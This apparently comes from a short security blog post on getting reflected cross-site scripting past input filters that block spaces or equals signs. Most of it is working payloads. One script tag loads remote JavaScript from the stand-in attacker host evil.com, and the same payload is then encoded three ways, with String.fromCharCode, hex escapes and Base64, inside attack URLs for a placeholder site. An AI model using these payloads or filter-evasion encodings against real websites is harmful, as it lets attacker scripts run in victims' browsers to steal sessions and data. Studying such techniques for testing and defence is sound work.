XSS (encoding/decoding issues)

Uncategorized August 19, 2021

Sometimes you may find a reflection, in which some characters (like =, space etc.) is not allowed). Lets say there is an xss at www.xyz.org/?s=<xss here>. But if you type <script src=”…”>, it does not reflect properly due to that equal character and space character. The example below shows how you may bypass the space character problem. 

<script>s=document.createElement('script');s.src='http://evil.com:11000/somefile.js';document.head.appendChild(s);</script>

But what if the equal sign is not allowed? Well, then just use document.write with string.fromCharCode. An encoder can be found here: https://eve.gd/2007/05/23/string-fromcharcode-encoder/

The above example could be encoded as follows:

http://www.xyz.org/?s=%3Cscript%3Edocument.write( String.fromCharCode(60,115,99,114,105,112,116,62,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,101,118,105,108,46,99,111,109,58,49,49,48,48,48,47,115,111,109,101,102,105,108,101,46,106,115,39,59,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,60,47,115,99,114,105,112,116,62,32,32))%3C/script%3E

Other ways:

HEX encoding ( use https://dencode.com/en/string/unicode-escape and match replace \u00 with %5cx )

http://www.xyz.org/?s=write('%5cx3c%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx3e%5cx73%5cx3d%5cx64%5cx6f%5cx63%5cx75%5cx6d%5cx65%5cx6e%5cx74%5cx2e%5cx63%5cx72%5cx65%5cx61%5cx74%5cx65%5cx45%5cx6c%5cx65%5cx6d%5cx65%5cx6e%5cx74%5cx28%5cx27%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx27%5cx29%5cx3b%5cx73%5cx2e%5cx73%5cx72%5cx63%5cx3d%5cx27%5cx68%5cx74%5cx74%5cx70%5cx3a%5cx2f%5cx2f%5cx65%5cx76%5cx69%5cx6c%5cx2e%5cx63%5cx6f%5cx6d%5cx3a%5cx31%5cx31%5cx30%5cx30%5cx30%5cx2f%5cx73%5cx6f%5cx6d%5cx65%5cx66%5cx69%5cx6c%5cx65%5cx2e%5cx6a%5cx73%5cx27%5cx3b%5cx64%5cx6f%5cx63%5cx75%5cx6d%5cx65%5cx6e%5cx74%5cx2e%5cx68%5cx65%5cx61%5cx64%5cx2e%5cx61%5cx70%5cx70%5cx65%5cx6e%5cx64%5cx43%5cx68%5cx69%5cx6c%5cx64%5cx28%5cx73%5cx29%5cx3b%5cx3c%5cx2f%5cx73%5cx63%5cx72%5cx69%5cx70%5cx74%5cx3e%5cx20%5cx20)'

Base64

http://www.xyz.org/?s=write(atob('PHNjcmlwdD5zPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Muc3JjPSdodHRwOi8vZXZpbC5jb206MTEwMDAvc29tZWZpbGUuanMnO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQocyk7PC9zY3JpcHQ+ICA='))
http://www.xyz.org/?s=write

Leave a Reply

Your email address will not be published. Required fields are marked *